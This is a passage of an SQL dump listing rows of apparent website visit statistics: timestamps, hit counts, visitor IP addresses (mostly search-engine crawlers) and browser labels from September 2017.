,0,'164.132.162.157','other'),(152149,1504483333,1,1,0,0,'91.209.11.236','other'),(152150,1504483616,1,1,0,0,'217.182.132.241','other'),(152151,1504483937,1,1,0,0,'141.8.183.5','other'),(152152,1504484854,1,1,0,0,'91.209.11.236','other'),(152153,1504485763,1,0,1,0,'66.249.75.155',''),(152154,1504486342,1,1,0,0,'95.108.181.63','other'),(152155,1504486783,1,1,0,0,'180.76.15.136','other'),(152156,1504486830,1,1,0,0,'95.108.181.69','other'),(152157,1504487153,1,1,0,0,'51.255.65.25','other'),(152158,1504487330,1,1,0,0,'51.255.65.27','other'),(152159,1504487532,1,1,0,0,'66.249.69.199','chrome'),(152160,1504488227,2,2,0,0,'91.209.11.236','other'),(152161,1504488584,1,1,0,0,'217.182.132.178','other'),(152162,1504488695,1,0,1,0,'66.249.69.195',''),(152163,1504488857,1,1,0,0,'217.182.132.75','other'),(152164,1504489099,1,1,0,0,'66.249.76.93','chrome'),(152165,1504489161,1,1,0,0,'141.8.142.56','other'),(152166,1504489929,1,1,0,0,'217.182.132.146','other'),(152167,1504490171,1,1,0,0,'217.69.133.5','other'),(152168,1504490189,1,1,0,0,'37.9.113.163','other'),(152169,1504490488,1,1,0,0,'217.182.132.241','other'),(152170,1504490589,1,1,0,0,'66.249.76.108','chrome'),(152171,1504490606,1,1,0,0,'66.249.76.107','chrome'),(152172,1504490978,1,1,0,0,'217.182.132.188','other'),(152173,1504491184,1,1,0,0,'51.255.65.63','other'),(152174,1504491905,1,1,0,0,'51.255.71.130','other'),(152175,1504492276,1,1,0,0,'8.29.198.27','other'),(152176,1504492319,1,1,0,0,'51.255.65.2','other'),(152177,1504492585,1,1,0,0,'217.182.132.185','other'),(152178,1504492871,1,1,0,0,'51.255.65.5','other'),(152179,1504492988,1,1,0,0,'217.182.132.154','other'),(152180,1504493045,1,1,0,0,'5.9.156.43','other'),(152181,1504493385,1,1,0,0,'217.182.132.147','other'),(152182,1504494077,1,0,1,0,'66.249.75.157',''),(152183,1504494308,1,1,0,0,'51.255.65.13','other'),(152184,1504494544,1,1,0,0,'217.182.132.30','other'),(152185,1504494911,1,1,0,0,'107.167.116.107','other'),(152186,1504495357,1,1,0,0,'217.182.132.19','other'),(152187,1504495358,1,1,0,0,'217.182.132.154','other'),(152188,1504495582,1,1,0,0,'51.255.65.8','other'),(152189,1504495828,2,2,0,0,'91.209.11.236','other'),(152190,1504495832,1,1,0,0,'217.182.132.60','other'),(152191,1504495961,1,1,0,0,'217.182.132.148','other'),(152192,1504495971,1,1,0,0,'217.182.132.52','other'),(152193,1504496094,1,1,0,0,'46.161.9.39','chrome'),(152194,1504496843,1,1,0,0,'5.45.207.64','other'),(152195,1504497158,1,1,0,0,'40.77.167.86','other'),(152196,1504498165,1,1,0,0,'51.255.65.51','other'),(152197,1504499173,1,0,1,0,'66.249.76.91',''),(152198,1504499759,1,1,0,0,'51.255.65.9','other'),(152199,1504499898,1,1,0,0,'217.182.132.156','other'),(152200,1504499956,1,1,0,0,'185.105.88.240','chrome'),(152201,1504500286,1,1,0,0,'5.45.207.32','other'),(152202,1504500342,1,1,0,0,'217.182.132.64','other'),(152203,1504501069,1,1,0,0,'91.209.11.236','other'),(152204,1504501258,1,1,0,0,'217.182.132.71','other'),(152205,1504501338,1,1,0,0,'141.8.142.45','other'),(152206,1504501653,1,0,1,0,'66.249.76.109',''),(152207,1504501774,1,1,0,0,'217.182.132.85','other'),(152208,1504502161,1,1,0,0,'5.45.207.32','other'),(152209,1504502235,1,1,0,0,'137.74.207.119','other'),(152210,1504502369,1,1,0,0,'5.45.207.64','other'),(152211,1504502774,1,1,0,0,'91.209.11.236','other'),(152212,1504502804,1,1,0,0,'51.255.71.112','other'),(152213,1504502951,1,1,0,0,'91.196.178.67','chrome'),(152214,1504503092,1,1,0,0,'8.29.198.25','other'),(152215,1504503135,2,2,0,0,'95.213.141.126','opera'),(152216,1504503296,1,1,0,0,'51.255.65.43','other'),(152217,1504503326,1,1,0,0,'141.8.142.45','other'),(152218,1504503498,1,1,0,0,'51.255.65.33','other'),(152219,1504503555,1,1,0,0,'137.74.207.102','other'),(152220,1504503567,1,1,0,0,'217.182.132.91','other'),(152221,1504503818,1,1,0,0,'37.9.113.163','other'),(152222,1504503927,1,1,0,0,'51.255.65.66','other'),(152223,1504504007,1,1,0,0,'91.196.178.70','firefox'),(152224,1504505172,1,1,0,0,'51.255.71.133','other'),(152225,1504506089,1,1,0,0,'51.255.65.53','other'),(152226,1504506682,1,1,0,0,'107.167.109.195','other'),(152227,1504506752,1,1,0,0,'216.244.66.237','other'),(152228,1504506778,1,1,0,0,'95.108.181.63','other'),(152229,1504506913,1,1,0,0,'66.102.9.57','chrome'),(152230,1504506932,1,1,0,0,'137.74.207.159','other'),(152231,1504507168,2,2,0,0,'91.196.177.46','chrome'),(152232,1504507225,1,1,0,0,'188.166.63.98','chrome'),(152233,1504507326,1,1,0,0,'213.180.203.32','other'),(152234,1504507494,1,1,0,0,'91.196.178.70','chrome'),(152235,1504507534,1,1,0,0,'91.196.177.15','chrome'),(152236,1504507686,1,1,0,0,'180.76.15.146','other'),(152237,1504507764,1,1,0,0,'40.77.167.86','other'),(152238,1504508321,1,1,0,0,'51.255.65.3','other'),(152239,1504508542,1,1,0,0,'141.8.142.21','other'),(152240,1504508616,1,0,1,0,'66.249.76.91',''),(152241,1504508750,1,1,0,0,'91.196.178.70','chrome'),(152242,1504508885,1,1,0,0,'217.182.132.72','other'),(152243,1504509104,1,1,0,0,'91.196.177.17','chrome'),(152244,1504509110,2,2,0,0,'5.45.207.64','other'),(152245,1504509135,1,1,0,0,'51.255.65.83','other'),(152246,1504509185,1,1,0,0,'95.108.181.69','other'),(152247,1504509586,1,1,0,0,'66.249.75.155','chrome'),(152248,1504509596,1,1,0,0,'37.9.113.94','other'),(152249,1504509612,1,1,0,0,'178.154.200.7','other'),(152250,1504509892,1,1,0,0,'46.161.9.39','firefox'),(152251,1504510018,1,1,0,0,'91.209.11.236','other'),(152252,1504510230,1,1,0,0,'164.132.162.164','other'),(152253,1504510407,1,1,0,0,'141.8.132.26','other'),(152254,1504510411,1,1,0,0,'141.8.142.21','other'),(152255,1504510464,1,1,0,0,'141.8.142.45','other'),(152256,1504510537,1,1,0,0,'217.182.132.88','other'),(152257,1504510651,1,1,0,0,'51.255.65.21','other'),(152258,1504510671,1,1,0,0,'93.74.164.216','chrome'),(152259,1504510673,1,1,0,0,'91.196.178.161','chrome'),(152260,1504510951,1,1,0,0,'178.154.200.7','other'),(152261,1504511007,2,2,0,0,'95.134.203.30','firefox'),(152262,1504511095,2,2,0,0,'91.196.178.72','firefox'),(152263,1504511191,1,1,0,0,'217.182.132.176','other'),(152264,1504511223,1,1,0,0,'91.196.178.66','chrome'),(152265,1504511607,1,1,0,0,'188.166.63.98','chrome'),(152266,1504511834,1,1,0,0,'137.74.207.120','other'),(152267,1504511894,1,1,0,0,'37.9.113.94','other'),(152268,1504512218,1,1,0,0,'95.108.181.63','other'),(152269,1504512532,1,1,0,0,'31.43.1.42','chrome'),(152270,1504512631,1,1,0,0,'217.182.132.192','other'),(152271,1504512633,1,1,0,0,'217.69.133.5','other'),(152272,1504512716,1,0,1,0,'66.249.76.91',''),(152273,1504513036,1,1,0,0,'141.8.183.1','other'),(152274,1504513515,1,1,0,0,'217.182.132.28','other'),(152275,1504513664,1,1,0,0,'51.255.65.56','other'),(152276,1504513916,1,1,0,0,'8.29.198.25','other'),(152277,1504514318,2,0,2,0,'66.249.76.108',''),(152278,1504514341,1,1,0,0,'137.74.207.116','other'),(152279,1504514436,1,1,0,0,'217.182.132.157','other'),(152280,1504514528,1,1,0,0,'51.255.65.78','other'),(152281,1504514776,1,1,0,0,'51.255.65.23','other'),(152282,1504514898,1,1,0,0,'46.161.9.39','chrome'),(152283,1504514975,1,1,0,0,'37.54.23.3','chrome'),(152284,1504515185,1,0,1,0,'66.249.69.195',''),(152285,1504515217,1,1,0,0,'91.209.11.236','other'),(152286,1504515577,1,1,0,0,'217.182.132.76','other'),(152287,1504515884,1,1,0,0,'178.154.200.36','other'),(152288,1504516350,1,1,0,0,'51.255.65.32','other'),(152289,1504516828,3,3,0,0,'91.209.11.236','other'),(152290,1504517011,9,9,0,0,'5.9.80.133','other'),(152291,1504517628,2,2,0,0,'91.196.178.65','chrome'),(152292,1504517643,2,2,0,0,'178.154.200.27','other'),(152293,1504517779,1,1,0,0,'66.249.76.107','chrome'),(152294,1504517784,1,1,0,0,'217.69.133.5','other'),(152295,1504518123,1,1,0,0,'95.108.181.63','other'),(152296,1504518989,1,1,0,0,'5.45.207.32','other'),(152297,1504519207,1,1,0,0,'37.53.227.102','firefox'),(152298,1504519239,1,1,0,0,'141.8.183.1','other'),(152299,1504519600,1,1,0,0,'40.77.167.86','other'),(152300,1504519776,1,1,0,0,'51.255.65.25','other'),(152301,1504519789,1,1,0,0,'62.205.136.219','other'),(152302,1504519907,1,1,0,0,'217.182.132.50','other'),(152303,1504519946,1,1,0,0,'95.108.181.69','other'),(152304,1504520276,1,1,0,0,'91.196.178.70','firefox'),(152305,1504520489,1,1,0,0,'217.182.132.51','other'),(152306,1504520830,1,1,0,0,'51.255.65.13','other'),(152307,1504520856,1,1,0,0,'137.74.207.116','other'),(152308,1504520895,1,1,0,0,'217.182.132.186','other'),(152309,1504521017,1,1,0,0,'141.8.142.45','other'),(152310,1504521029,1,1,0,0,'164.132.162.160','other'),(152311,1504521092,2,2,0,0,'141.8.142.21','other'),(152312,1504521518,1,1,0,0,'141.8.183.5','other'),(152313,1504521580,1,1,0,0,'51.255.65.84','other'),(152314,1504521585,1,1,0,0,'217.182.132.82','other'),(152315,1504521852,1,1,0,0,'178.154.200.7','other'),(152316,1504522362,1,1,0,0,'62.205.136.219','other'),(152317,1504522437,1,1,0,0,'91.196.178.166','chrome'),(152318,1504522671,1,1,0,0,'213.227.198.5','chrome'),(152319,1504522857,1,1,0,0,'91.209.11.236','other'),(152320,1504523258,1,1,0,0,'217.69.133.194','other'),(152321,1504523507,1,1,0,0,'91.196.178.65','chrome'),(152322,1504523686,4,4,0,0,'81.1.242.33','other'),(152323,1504523858,1,1,0,0,'5.45.207.64','other'),(152324,1504524108,1,1,0,0,'95.134.50.178','chrome'),(152325,1504524717,1,1,0,0,'5.45.207.32','other'),(152326,1504524736,1,1,0,0,'8.29.198.25','other'),(152327,1504524937,1,1,0,0,'51.255.65.86','other'),(152328,1504525417,1,1,0,0,'51.255.65.30','other'),(152329,1504525555,1,1,0,0,'217.182.132.81','other'),(152330,1504525594,1,1,0,0,'5.255.253.2','other'),(152331,1504525944,1,1,0,0,'91.209.11.236','other'),(152332,1504526285,1,1,0,0,'195.54.42.49','chrome'),(152333,1504526395,1,1,0,0,'162.210.196.100','other'),(152334,1504526535,1,1,0,0,'216.244.66.237','other'),(152335,1504526620,1,1,0,0,'217.182.132.187','other'),(152337,1504526664,1,1,0,0,'5.45.207.64','other'),(152338,1504526671,1,1,0,0,'37.9.113.163','other'),(152339,1504526907,1,1,0,0,'51.255.71.129','other'),(152340,1504527154,1,1,0,0,'95.108.181.63','other'),(152341,1504527603,1,1,0,0,'141.8.142.45','other'),(152342,1504528928,1,1,0,0,'51.255.71.131','other'),(152343,1504528991,1,1,0,0,'91.209.11.236','other'),(152344,1504529303,1,0,1,0,'66.249.69.195',''),(152345,1504529780,1,0,1,0,'66.249.76.93',''),(152346,1504529820,1,1,0,0,'37.9.113.163','other'),(152347,1504530855,1,1,0,0,'94.158.65.122','chrome'),(152348,1504531234,1,1,0,0,'164.132.164.180','other'),(152349,1504531359,1,1,0,0,'95.108.181.69','other'),(152350,1504531474,1,1,0,0,'217.69.133.203','other'),(152351,1504531651,1,1,0,0,'51.255.65.30','other'),(152352,1504531815,1,1,0,0,'62.149.29.60','chrome'),(152353,1504531836,1,1,0,0,'91.196.178.72','firefox'),(152354,1504531958,1,1,0,0,'37.9.113.163','other'),(152355,1504532591,1,1,0,0,'217.182.132.63','other'),(152356,1504533130,1,1,0,0,'51.255.65.59','other'),(152357,1504533161,1,1,0,0,'137.74.203.194','other'),(152358,1504533696,1,1,0,0,'51.255.64.106','other'),(152359,1504534330,1,1,0,0,'51.255.65.44','other'),(152360,1504534416,2,2,0,0,'46.229.168.69','other'),(152361,1504534438,2,2,0,0,'46.229.168.77','other'),(152362,1504534470,2,2,0,0,'46.229.168.74','other'),(152363,1504534488,1,1,0,0,'46.229.168.79','other'),(152364,1504534506,2,2,0,0,'46.229.168.76','other'),(152365,1504534525,1,1,0,0,'46.229.168.67','other'),(152366,1504534544,1,1,0,0,'46.229.168.71','other'),(152367,1504534579,1,1,0,0,'46.229.168.75','other'),(152368,1504534608,1,1,0,0,'46.229.168.66','other'),(152369,1504534716,1,1,0,0,'91.196.178.70','chrome'),(152370,1504534807,1,1,0,0,'217.182.132.146','other'),(152371,1504535555,1,1,0,0,'8.29.198.25','other'),(152372,1504535556,1,1,0,0,'91.196.177.46','chrome'),(152373,1504536992,1,1,0,0,'164.132.162.187','other'),(152374,1504537398,1,1,0,0,'157.55.39.61','other'),(152375,1504537649,1,1,0,0,'51.255.71.126','other'),(152376,1504537743,1,1,0,0,'141.8.183.1','other'),(152377,1504538031,1,1,0,0,'91.209.11.236','other'),(152378,1504538816,1,1,0,0,'91.196.178.164','chrome'),(152379,1504538932,1,1,0,0,'141.8.142.21','other'),(152380,1504539389,1,1,0,0,'91.209.11.236','other'),(152381,1504539516,1,1,0,0,'51.255.65.29','other'),(152382,1504539744,1,1,0,0,'137.74.207.116','other'),(152383,1504539763,1,1,0,0,'51.255.65.18','other'),(152384,1504539868,1,1,0,0,'157.55.39.211','other'),(152385,1504540222,1,1,0,0,'51.255.65.7','other'),(152386,1504540761,2,2,0,0,'91.209.11.236','other'),(152387,1504541477,1,1,0,0,'141.8.183.19','other'),(152388,1504541599,1,1,0,0,'51.255.65.79','other'),(152389,1504542082,1,1,0,0,'217.182.132.173','other'),(152390,1504542573,1,0,1,0,'66.249.69.199',''),(152391,1504543023,1,1,0,0,'51.255.65.97','other'),(152392,1504543303,1,1,0,0,'217.182.132.184','other'),(152393,1504543309,1,0,1,0,'66.249.76.93',''),(152394,1504543372,1,1,0,0,'217.182.132.172','other'),(152395,1504543604,2,2,0,0,'91.209.11.236','other'),(152396,1504544630,1,1,0,0,'178.154.200.7','other'),(152397,1504544647,1,1,0,0,'137.74.203.194','other'),(152398,1504545609,1,1,0,0,'51.255.65.55','other'),(152399,1504545614,1,1,0,0,'141.8.142.45','other'),(152400,1504545667,1,1,0,0,'51.255.65.92','other'),(152401,1504545703,1,1,0,0,'51.255.65.45','other'),(152402,1504545826,1,1,0,0,'213.180.203.32','other'),(152403,1504545914,1,1,0,0,'91.196.178.37','chrome'),(152404,1504546376,1,1,0,0,'8.29.198.25','other'),(152405,1504546532,1,1,0,0,'51.255.65.94','other'),(152406,1504546882,1,1,0,0,'217.182.132.87','other'),(152407,1504547078,1,1,0,0,'66.249.75.157','chrome'),(152408,1504547130,1,0,1,0,'66.249.76.93',''),(152409,1504547793,1,1,0,0,'95.108.181.63','other'),(152410,1504548192,1,1,0,0,'51.255.71.121','other'),(152411,1504548520,1,1,0,0,'37.9.113.163','other'),(152412,1504548850,1,1,0,0,'40.77.167.86','other'),(152413,1504549464,1,1,0,0,'217.182.132.94','other'),(152414,1504549585,1,1,0,0,'51.255.65.67','other'),(152415,1504549649,1,1,0,0,'51.255.65.96','other'),(152416,1504549675,1,1,0,0,'51.255.65.94','other'),(152417,1504550170,1,1,0,0,'137.74.201.99','other'),(152418,1504550408,1,1,0,0,'217.182.132.52','other'),(152419,1504550606,1,1,0,0,'217.182.132.50','other'),(152420,1504551227,1,1,0,0,'164.132.162.159','other'),(152421,1504551751,1,1,0,0,'157.55.39.61','other'),(152422,1504551772,1,1,0,0,'51.255.65.90','other'),(152423,1504551941,1,1,0,0,'51.255.71.114','other'),(152424,1504552013,1,1,0,0,'51.255.65.18','other'),(152425,1504552110,1,1,0,0,'95.108.181.69','other'),(152426,1504553028,1,1,0,0,'66.249.69.195','chrome'),(152427,1504553088,1,1,0,0,'95.108.181.69','other'),(152428,1504553194,1,1,0,0,'5.45.207.32','other'),(152429,1504553442,2,2,0,0,'5.45.207.64','other'),(152430,1504553480,1,1,0,0,'137.74.207.164','other'),(152431,1504553685,1,1,0,0,'37.9.113.195','other'),(152432,1504553817,1,1,0,0,'141.8.183.1','other'),(152433,1504553852,1,1,0,0,'51.255.71.129','other'),(152434,1504554357,1,1,0,0,'51.255.65.2','other'),(152435,1504555153,1,1,0,0,'216.244.66.237','other'),(152436,1504555618,1,1,0,0,'51.255.65.70','other'),(152437,1504556384,1,1,0,0,'5.45.207.64','other'),(152438,1504557193,1,1,0,0,'8.29.198.26','other'),(152439,1504557269,1,1,0,0,'51.255.65.39','other'),(152440,1504558003,1,1,0,0,'180.76.15.147','other'),(152441,1504558095,1,0,1,0,'66.249.69.199',''),(152442,1504558152,1,1,0,0,'51.255.71.117','other'),(152443,1504558438,1,1,0,0,'51.255.71.114','other'),(152444,1504558779,1,1,0,0,'95.108.181.58','other'),(152445,1504558889,1,1,0,0,'217.69.133.2','other'),(152446,1504559270,1,1,0,0,'37.9.113.163','other'),(152447,1504559344,1,1,0,0,'141.8.142.45','other'),(152448,1504559567,1,1,0,0,'95.108.181.69','other'),(152449,1504559902,1,1,0,0,'51.255.65.32','other'),(152450,1504560429,1,1,0,0,'51.255.71.117','other'),(152451,1504560850,1,1,0,0,'46.161.9.39','firefox'),(152452,1504561254,1,1,0,0,'37.9.113.128','other'),(152453,1504561354,1,1,0,0,'5.45.207.32','other'),(152454,1504561414,1,1,0,0,'37.9.113.163','other'),(152455,1504561514,1,1,0,0,'5.45.207.64','other'),(152456,1504561659,1,1,0,0,'51.255.71.115','other'),(152457,1504561771,1,1,0,0,'66.249.75.157','chrome'),(152458,1504561827,1,1,0,0,'217.182.132.54','other'),(152459,1504561867,1,0,1,0,'66.249.76.91',''),(152460,1504562143,1,1,0,0,'178.154.200.7','other'),(152461,1504562342,1,0,1,0,'66.249.69.201',''),(152462,1504562646,1,1,0,0,'217.182.132.28','other'),(152463,1504562910,1,1,0,0,'217.182.132.62','other'),(152464,1504563302,1,1,0,0,'217.182.132.64','other'),(152465,1504563484,1,1,0,0,'51.255.65.14','other'),(152466,1504563551,1,1,0,0,'51.255.65.84','other'),(152467,1504564415,1,1,0,0,'37.9.113.94','other'),(152468,1504564508,1,1,0,0,'66.249.76.91','chrome'),(152469,1504565037,1,1,0,0,'157.55.39.211','other'),(152470,1504565351,1,1,0,0,'217.182.132.66','other'),(152471,1504565413,1,1,0,0,'217.182.132.18','other'),(152472,1504565801,1,1,0,0,'141.8.183.19','other'),(152473,1504566106,1,1,0,0,'51.255.65.46','other'),(152474,1504566483,1,1,0,0,'37.9.113.138','other'),(152475,1504566537,1,1,0,0,'217.182.132.190','other'),(152476,1504566735,1,1,0,0,'217.182.132.64','other'),(152477,1504566998,1,1,0,0,'95.108.181.63','other'),(152478,1504567302,1,1,0,0,'176.31.231.10','other'),(152479,1504567852,1,1,0,0,'217.182.132.148','other'),(152480,1504568016,1,1,0,0,'8.29.198.27','other'),(152481,1504568073,1,1,0,0,'201.18.18.173','firefox'),(152482,1504568360,1,1,0,0,'217.182.132.37','other'),(152483,1504568662,1,0,1,0,'66.249.69.199',''),(152484,1504569290,2,1,1,0,'66.249.76.91',''),(152485,1504569600,2,2,0,0,'217.182.132.65','other'),(152486,1504569737,1,1,0,0,'216.244.66.237','other'),(152487,1504570045,1,0,1,0,'66.249.69.199',''),(152488,1504570332,1,1,0,0,'178.154.200.7','other'),(152489,1504572500,1,1,0,0,'5.45.207.40','other'),(152490,1504573256,1,1,0,0,'141.8.183.1','other'),(152491,1504573555,1,1,0,0,'178.154.200.7','other'),(152492,1504574172,1,1,0,0,'217.182.132.192','other'),(152493,1504574269,1,1,0,0,'217.182.132.60','other'),(152494,1504574864,1,1,0,0,'164.132.162.157','other'),(152495,1504575093,1,1,0,0,'37.9.113.163','other'),(152496,1504575610,1,1,0,0,'217.182.132.80','other'),(152497,1504576071,1,1,0,0,'185.8.107.163','chrome'),(152498,1504576111,1,1,0,0,'217.182.132.176','other'),(152499,1504576361,1,1,0,0,'217.182.132.192','other'),(152500,1504576833,1,1,0,0,'216.244.66.237','other'),(152501,1504576944,1,1,0,0,'185.105.88.240','opera'),(152502,1504576964,1,0,1,0,'66.249.76.89',''),(152503,1504576969,1,0,1,0,'66.249.76.109',''),(152504,1504577150,1,1,0,0,'141.8.142.43','other'),(152505,1504577222,1,1,0,0,'51.255.71.118','other'),(152506,1504577263,1,1,0,0,'217.182.132.154','other'),(152507,1504577365,1,1,0,0,'217.182.132.16','other'),(152508,1504577513,1,1,0,0,'164.132.162.187','other'),(152509,1504577842,1,1,0,0,'217.182.132.58','other'),(152510,1504578828,1,1,0,0,'95.220.89.45','msie'),(152511,1504578837,1,1,0,0,'8.29.198.26','other'),(152512,1504579009,1,1,0,0,'141.8.142.21','other'),(152513,1504579490,1,1,0,0,'51.255.65.61','other'),(152514,1504579750,1,1,0,0,'51.255.65.2','other'),(152515,1504579877,1,1,0,0,'178.154.200.27','other'),(152516,1504580014,1,1,0,0,'217.182.132.240','other'),(152517,1504580390,1,1,0,0,'213.180.203.32','other'),(152518,1504580548,1,1,0,0,'51.255.71.127','other'),(152519,1504581463,1,1,0,0,'141.8.183.19','other'),(152520,1504581547,1,1,0,0,'37.204.50.137','chrome'),(152521,1504581810,1,1,0,0,'91.209.11.236','other'),(152522,1504581848,1,0,1,0,'66.249.64.30',''),(152523,1504582043,1,1,0,0,'157.55.39.117','other'),(152524,1504582048,1,1,0,0,'37.9.113.94','other'),(152525,1504582102,1,1,0,0,'141.8.142.45','other'),(152526,1504582105,1,1,0,0,'5.45.207.56','other'),(152527,1504582436,1,1,0,0,'178.154.200.7','other'),(152528,1504582544,1,1,0,0,'217.182.132.36','other'),(152529,1504582600,1,1,0,0,'141.8.183.1','other'),(152530,1504582728,1,1,0,0,'51.255.65.12','other'),(152531,1504583469,1,1,0,0,'51.255.71.125','other'),(152532,1504583584,2,2,0,0,'91.209.11.236','other'),(152533,1504584022,1,1,0,0,'164.132.162.154','other'),(152534,1504584111,1,1,0,0,'217.182.132.51','other'),(152535,1504584335,1,1,0,0,'141.8.183.1','other'),(152536,1504585226,1,1,0,0,'51.255.71.113','other'),(152537,1504585341,1,1,0,0,'217.182.132.62','other'),(152538,1504585415,1,1,0,0,'51.255.65.11','other'),(152539,1504586403,2,2,0,0,'95.108.181.63','other'),(152540,1504586511,1,1,0,0,'217.182.132.148','other'),(152541,1504586582,1,1,0,0,'137.74.207.161','other'),(152542,1504586780,1,1,0,0,'141.8.142.21','other'),(152543,1504587251,1,1,0,0,'217.182.132.73','other'),(152544,1504587622,1,1,0,0,'217.182.132.17','other'),(152545,1504587800,1,1,0,0,'164.132.162.155','other'),(152546,1504588068,1,1,0,0,'59.41.207.155','other'),(152547,1504588345,1,1,0,0,'217.182.132.18','other'),(152548,1504588435,1,1,0,0,'51.255.71.120','other'),(152549,1504588574,1,1,0,0,'91.196.178.70','firefox'),(152550,1504588709,1,1,0,0,'91.196.178.101','chrome'),(152551,1504588854,1,1,0,0,'213.180.203.32','other'),(152552,1504589322,1,1,0,0,'5.255.253.4','other'),(152553,1504589578,1,1,0,0,'178.154.171.77','other'),(152554,1504589579,1,1,0,0,'178.154.200.35','other'),(152555,1504589652,1,1,0,0,'8.29.198.26','other'),(152556,1504589809,1,1,0,0,'46.175.146.25','chrome'),(152557,1504589819,1,1,0,0,'51.255.65.75','other'),(152558,1504590465,1,1,0,0,'51.255.65.74','other'),(152559,1504591085,1,1,0,0,'216.244.66.237','other'),(152560,1504591247,1,1,0,0,'91.196.178.70','firefox'),(152561,1504591389,1,1,0,0,'141.8.142.21','other'),(152562,1504591436,1,1,0,0,'51.255.65.19','other'),(152563,1504591840,1,1,0,0,'92.112.45.109','chrome'),(152564,1504592321,1,1,0,0,'51.255.65.20','other'),(152565,1504592413,1,1,0,0,'46.229.168.75','other'),(152566,1504592431,7,7,0,0,'46.229.168.67','other'),(152567,1504592450,3,3,0,0,'46.229.168.80','other'),(152568,1504592452,1,0,1,0,'66.249.70.25',''),(152569,1504592475,7,7,0,0,'46.229.168.71','other'),(152570,1504592505,4,4,0,0,'46.229.168.68','other'),(152571,1504592522,4,4,0,0,'46.229.168.65','other'),(152572,1504592536,1,1,0,0,'5.45.207.32','other'),(152573,1504592541,5,5,0,0,'46.229.168.70','other'),(152574,1504592576,5,5,0,0,'46.229.168.72','other'),(152575,1504592622,3,3,0,0,'46.229.168.66','other'),(152576,1504592630,5,5,0,0,'46.229.168.76','other'),(152577,1504592660,1,1,0,0,'213.180.203.32','other'),(152578,1504592665,7,7,0,0,'46.229.168.69','other'),(152579,1504592666,1,1,0,0,'91.196.177.46','chrome'),(152580,1504592687,4,4,0,0,'46.229.168.73','other'),(152581,1504592730,1,1,0,0,'217.182.132.64','other'),(152582,1504592777,3,3,0,0,'46.229.168.79','other'),(152583,1504592779,1,1,0,0,'95.132.55.200','firefox'),(152584,1504592814,8,8,0,0,'46.229.168.74','other'),(152585,1504592851,1,1,0,0,'137.74.207.170','other'),(152586,1504592901,1,1,0,0,'91.196.178.70','chrome'),(152587,1504593145,1,0,1,0,'66.249.70.29',''),(152588,1504593192,1,1,0,0,'141.8.142.21','other'),(152589,1504593215,5,5,0,0,'46.229.168.77','other'),(152590,1504593339,7,7,0,0,'46.229.168.75','other'),(152591,1504593446,4,4,0,0,'46.229.168.67','other'),(152592,1504593502,5,5,0,0,'46.229.168.71','other'),(152593,1504593544,4,4,0,0,'46.229.168.68','other'),(152594,1504593557,3,3,0,0,'46.229.168.70','other'),(152595,1504593574,1,1,0,0,'188.166.55.118','chrome'),(152596,1504593723,6,6,0,0,'46.229.168.74','other'),(152598,1504593726,1,1,0,0,'91.196.178.71','firefox'),(152599,1504593737,4,4,0,0,'46.229.168.79','other'),(152600,1504593755,2,2,0,0,'46.229.168.80','other'),(152601,1504593782,11,11,0,0,'46.229.168.78','other'),(152602,1504593788,2,2,0,0,'5.45.207.64','other'),(152603,1504593917,7,7,0,0,'46.229.168.76','other'),(152604,1504593935,4,4,0,0,'46.229.168.65','other'),(152605,1504594154,5,5,0,0,'46.229.168.73','other'),(152606,1504594292,3,3,0,0,'46.229.168.69','other'),(152607,1504594310,2,2,0,0,'46.229.168.75','other'),(152608,1504594386,1,1,0,0,'217.182.132.4','other'),(152609,1504594413,1,0,1,0,'66.249.70.25',''),(152610,1504594504,6,6,0,0,'46.229.168.70','other'),(152611,1504594527,3,3,0,0,'46.229.168.67','other'),(152612,1504594569,4,4,0,0,'46.229.168.66','other'),(152613,1504594582,1,1,0,0,'46.229.168.68','other'),(152614,1504594618,5,5,0,0,'46.229.168.71','other'),(152615,1504594713,4,4,0,0,'46.229.168.77','other'),(152616,1504594749,3,3,0,0,'46.229.168.78','other'),(152617,1504594762,1,1,0,0,'46.229.168.74','other'),(152618,1504594809,2,2,0,0,'5.45.207.64','other'),(152619,1504594871,3,3,0,0,'46.229.168.80','other'),(152620,1504594943,1,1,0,0,'91.196.178.132','chrome'),(152621,1504594944,2,2,0,0,'46.229.168.79','other'),(152622,1504594980,3,3,0,0,'46.229.168.72','other'),(152623,1504594999,2,2,0,0,'46.229.168.65','other'),(152624,1504595032,1,1,0,0,'217.69.133.9','other'),(152625,1504595060,1,1,0,0,'217.182.132.21','other'),(152626,1504595215,1,1,0,0,'46.229.168.75','other'),(152627,1504595274,2,2,0,0,'91.209.11.236','other'),(152628,1504595285,1,1,0,0,'51.255.65.92','other'),(152629,1504595495,1,1,0,0,'188.166.55.118','chrome'),(152630,1504595516,1,1,0,0,'51.255.71.131','other'),(152631,1504595772,1,1,0,0,'5.45.207.64','other'),(152632,1504596085,1,1,0,0,'141.8.183.1','other'),(152633,1504596211,1,1,0,0,'37.52.31.63','chrome'),(152634,1504596345,1,1,0,0,'185.137.18.52','chrome'),(152635,1504596470,1,1,0,0,'146.120.30.201','chrome'),(152636,1504596663,1,1,0,0,'157.55.39.211','other'),(152637,1504596800,1,1,0,0,'51.255.65.16','other'),(152638,1504597655,1,0,1,0,'66.249.70.27',''),(152639,1504597957,1,1,0,0,'51.255.65.11','other'),(152640,1504598034,1,1,0,0,'51.255.71.123','other'),(152641,1504598135,1,1,0,0,'92.113.14.21','chrome'),(152642,1504598213,1,1,0,0,'95.132.135.105','firefox'),(152643,1504598274,1,1,0,0,'51.255.71.115','other'),(152644,1504598994,1,1,0,0,'40.77.167.86','other'),(152645,1504599087,1,1,0,0,'217.182.132.61','other'),(152646,1504599138,1,1,0,0,'91.196.178.65','firefox'),(152647,1504599288,1,0,1,0,'66.249.70.25',''),(152648,1504599891,1,1,0,0,'157.55.39.61','other'),(152649,1504599912,1,0,1,0,'66.249.64.29',''),(152650,1504600344,1,1,0,0,'94.228.207.155','chrome'),(152651,1504600365,1,1,0,0,'217.182.132.35','other'),(152652,1504600396,1,1,0,0,'217.182.132.186','other'),(152653,1504600465,1,1,0,0,'146.120.30.201','chrome'),(152654,1504600478,1,1,0,0,'8.29.198.25','other'),(152655,1504600678,1,1,0,0,'51.255.65.52','other'),(152656,1504600904,1,1,0,0,'51.255.65.62','other'),(152657,1504601106,2,2,0,0,'173.212.249.102','other'),(152658,1504601224,1,1,0,0,'217.182.132.152','other'),(152659,1504601234,1,1,0,0,'51.255.71.132','other'),(152660,1504601439,1,1,0,0,'164.132.162.153','other'),(152661,1504601826,1,1,0,0,'164.132.164.180','other'),(152662,1504601885,1,1,0,0,'51.255.71.122','other'),(152663,1504601995,1,1,0,0,'91.196.1